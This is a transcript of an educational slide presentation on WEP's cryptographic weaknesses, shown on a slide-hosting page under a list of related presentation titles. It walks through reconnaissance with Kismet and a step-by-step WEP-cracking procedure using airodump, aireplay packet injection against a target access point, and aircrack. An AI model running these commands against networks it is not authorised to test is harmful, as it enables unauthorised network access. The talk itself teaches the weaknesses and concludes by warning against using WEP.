The Trouble with WEP Or, cracking WiFi networks for fun & profit (not really) Jim Owens.

Slides:



Advertisements
Similar presentations
Overview How to crack WEP and WPA
Advertisements

Crack WEP Lab Last Update Copyright 2014 Kenneth M. Chipps Ph.D.
Wireless Cracking By: Christopher Zacky.
WLAN Security: Cracking WEP/WPA
WEP 1 WEP WEP 2 WEP  WEP == Wired Equivalent Privacy  The stated goal of WEP is to make wireless LAN as secure as a wired LAN  According to Tanenbaum:
Attack and Defense in Wireless Networks Presented by Aleksandr Doronin.
1 MD5 Cracking One way hash. Used in online passwords and file verification.
Security flaws of the WEP-Protocol by Bastian Sopora, Seminar Computer Security 2006.
WEP Weaknesses Or “What on Earth does this Protect” Roy Werber.
Wireless LAN Security Jerry Usery CS 522 December 6 th, 2006.
How To Not Make a Secure Protocol WEP Dan Petro.
W i reless LAN Security Presented by: Pallavi Priyadarshini Student ID
Wired Equivalent Privacy (WEP)
Vulnerability In Wi-Fi By Angus U CS 265 Section 2 Instructor: Mark Stamp.
Kemal AkkayaWireless & Network Security 1 Department of Computer Science Southern Illinois University Carbondale Wireless and Network Security Lecture.
RC4 1 RC4 RC4 2 RC4  Invented by Ron Rivest o “RC” is “Ron’s Code” or “Rivest Cipher”  A stream cipher  Generate keystream byte at a step o Efficient.
Wireless Security Presentation by Paul Petty and Sooner Brooks-Heath.
The Final Nail in WEP’s Coffin Andrea Bittau, Mark Handley – University College London Joshua Lackey - Microsoft CPS372 Gordon College.
15 November Wireless Security Issues Cheyenne Hollow Horn SFS Presentation 2004.
WIRELESS NETWORK SECURITY. Hackers Ad-hoc networks War Driving Man-in-the-Middle Caffe Latte attack.
Security – Wired Equivalent Privacy (WEP) By Shruthi B Krishnan.
Wireless Insecurity.
Wireless Security.
AJ Mancini IV Paul Schiffgens Jack O’Hara. WIRELESS SECURITY  Brief history of Wi-Fi  Wireless encryption standards  WEP/WPA  The problem with WEP.
WLAN What is WLAN? Physical vs. Wireless LAN
Wireless Attacks. Set up the APs Computer IP: Subnet Mask: Router IP address: –
MASNET GroupXiuzhen ChengFeb 8, 2006 CSCI388 Project 1 Crack the WEP key Liran Ma Department of Computer Science The George Washington University
Wireless security & privacy Authors: M. Borsc and H. Shinde Source: IEEE International Conference on Personal Wireless Communications 2005 (ICPWC 2005),
CSC-682 Advanced Computer Security
CWNA Guide to Wireless LANs, Second Edition Chapter Eight Wireless LAN Security and Vulnerabilities.
A History of WEP The Ups and Downs of Wireless Security.
Ethical Hacking Defeating Wireless Security. 2 Contact Sam Bowne Sam Bowne Computer Networking and Information Technology Computer Networking and Information.
Wireless Network Security Dr. John P. Abraham Professor UTPA.
COEN 350 Mobile Security. Wireless Security Wireless offers additional challenges: Physical media can easily be sniffed. War Driving Legal? U.S. federal.
Lesson 20-Wireless Security. Overview Introduction to wireless networks. Understanding current wireless technology. Understanding wireless security issues.
Wireless Insecurity By: No’eau Kamakani Robert Whitmire.
Wireless Networking Concepts By: Forrest Finkler Computer Science 484 Networking Concepts.
Done By : Ahmad Al-Asmar Wireless LAN Security Risks and Solutions.
Wireless Security Presented by: Amit Kumar Singh Instructor : Dr. T. Andrew Yang.
Wireless Encryption: WEP and cracking it. Eric Shea.
CWSP Guide to Wireless Security Chapter 2 Wireless LAN Vulnerabilities.
Hands-On Ethical Hacking and Network Defense Lecture 14 Cracking WEP Last modified
Analyzing Wireless Security in Columbia, Missouri Matthew Chittum Clayton Harper John Mixon Johnathan Walton.
WEP AND WPA by Kunmun Garabadu. Wireless LAN Hot Spot : Hotspot is a readily available wireless connection.  Access Point : It serves as the communication.
Wireless Network Hacking.  Authentication Techniques  1. Open System: no security techniques  2. Shared-Key: uses hashed string challenge with WEP.
Wireless Networking & Security Greg Stabler Spencer Smith.
WEP Case Study Information Assurance Fall or Wi-Fi IEEE standard for wireless communication –Operates at the physical/data link layer –Operates.
Wired Equivalent Privacy (WEP): The first ‘confidentiality’ algorithm for the wireless IEEE standard. PRESENTED BY: Samuel Grush and Barry Preston.
Encryption Protocols used in Wireless Networks Derrick Grooms.
1 Wireless Threats 1 – Cracking WEP Cracking WEP in Chapter 5 of Wireless Maximum Security by Peikari, C. and Fogie, S.
Wireless Security A lab that actually works! Anne Hewitt Oscar Salazar A lab that actually works! Anne Hewitt Oscar Salazar.
Wireless Security Rick Anderson Pat Demko. Wireless Medium Open medium Broadcast in every direction Anyone within range can listen in No Privacy Weak.
KSU 2015-Summer Cyber Security | Group 1 | Seul Alice Bang Get a Wifi Password.
 Houses  In businesses  Local institutions  WEP – Wired Equivalent Privacy -Use of Initialization Vectors (IVs) -RC4 Traffic Key (creates keystreams)
Wireless Security John Himmelein Erick Andrew Christian Adam Varun Bapna.
How To Not Make a Secure Protocol WEP Dan Petro.
Wired Equivalent Privacy (WEP) Chris Overcash. Contents What is WEP? What is WEP? How is it implemented? How is it implemented? Why is it insecure? Why.
WLAN Security1 Security of WLAN Máté Szalay
WPA Cracking with Rainbow Tables For Educational Purposes Only Kurt Wondra November 18 th, 2010  1) Scanning for Vulnerable Networks  2) Capturing Usable.
Wireless Attacks: WEP Module Type: Basic Method Module Number: 0x00
We will talking about : What is WAP ? What is WAP2 ? Is there secure ?
WEP & WPA Mandy Kershishnik.
Advanced Penetration testing
Only For Education Purpose
Wireless Security Ian Bodley.
Hacking Wi-Fi Beyond Script Kiddie and WEP
Advanced Penetration testing
Security Issues with Wireless Protocols
Advanced Penetration testing
Presentation transcript:

The Trouble with WEP Or, cracking WiFi networks for fun & profit (not really) Jim Owens

Overview Background and a little history How WEP works WEP’s major weaknesses A short course in wardriving Using kismet to scout out the wireless landscape Zeroing in with the aircrack-ng suite airodump, to capture traffic aireplay, to replay weakly encrypted packets aircrack, to find the key using statistical methods

Background & history… Wireless Equivalent Privacy Adopted in 1999 as part of standard Later swallowed whole by b standard Initially, used only 40-bit encryption keys, due to technology export restrictions Later, expanded to 104-bit keys when export restrictions were eased Used 6 times as often as WPA/WPA2 despite known fatal weakness* (85% / 14% / 1%) *Based on a 2006 survey in Seattle area

How WEP works 1. Plain text gets CRC-32 checksum appended bit initialization vector pre-pended to key as a seed for RC4 key scheduling algorithm 3. RC4’s pseudo-random generation algorithm outputs keystream 4. Keystream XORed with plain text 5. IV in plain text pre-pended to message 6. On receipt, keystream regenerated and XORed with cipher text to produce plain text

WEP’s major weaknesses IV space too small (2 24 ) On a busy network, IVs must repeat in <= 5 hours 50% probability that IV repeats in 5,000 packets RC4 algorithm produces “weak” IVs that can be correctly guessed 5% or 13% of the time No key management; typically just one key IP traffic contains much known plaintext data Open to injected traffic that is rebroadcast

Wardriving: Kismet Network detector, sniffer, IDS Works on b, a, g networks Uses passive monitoring, so hard to detect Logs sniffed packets in formats compatible with Wireshark/Tcpdump, Airsnort Channel surfs automatically Optionally, supports GPS for network location

Kismet: Install & configure Binary packages available for most systems Requires WiFi adaptor that supports monitor mode as “capture source” Logs traffic in popular formats* Specify source in /etc/kismet/kismet.conf, as driver,device,source_name source=ipw2200,eth1,Stella *Wireshark, Airsnort, etc.

Stella, the WiFi attack animal!

Wardriving: Recon phase Use Kismet to survey WiFi landscape and to choose a target network Record necessary data for Aircrack attack: Channel number? SSID? Access point MAC address?

Wardriving: Kismet

Wardriving: Attack phase Aircrack-ng: Software for network detection, sniffing, WEP cracking, and analysis Works on b, a, g Uses passive monitoring & packet injection Main tools aircrack-ng: Cracking airdecap: Packet decryption airmon: Monitor mode switching aireplay: Packet injection (Linux only) airodump: Exports traffic to.cap files

Wardriving: Aircrack procedure 1.Bring up adapter on target’s channel in monitor mode: # ifconfig wlan0 up # iwconfig wlan0 mode Monitor channel 9 2.Capture packets to file on channel, IVs only # airodump wlan0./berlin_dump 9 1

Wardriving: Airodump

Wardriving: Aircrack procedure 3.Find weakly-encrypted packets to replay in interactive mode # aireplay -2 -b 00:14:6C:40:BA:A6 \ -x 512 wlan0 4.Finally, crack WEP key with captured IVs # aircrack -n 64 berlin-dump.ivs

Wardriving: Aireplay

Wardriving: Aircrack

Summary WEP has numerous serious flaws WEP's flaws are thoroughly documented WEP is readily exploitable in a short time, by unskilled attackers, using readily available tools Strong protection is readily available Bottom line: Don't use WEP, period!

Questions?

Feedback: Privacy Policy Feedback
Do Not Sell My Personal Information
About project: SlidePlayer Terms of Service

© 2025 SlidePlayer.com. Inc. All rights reserved.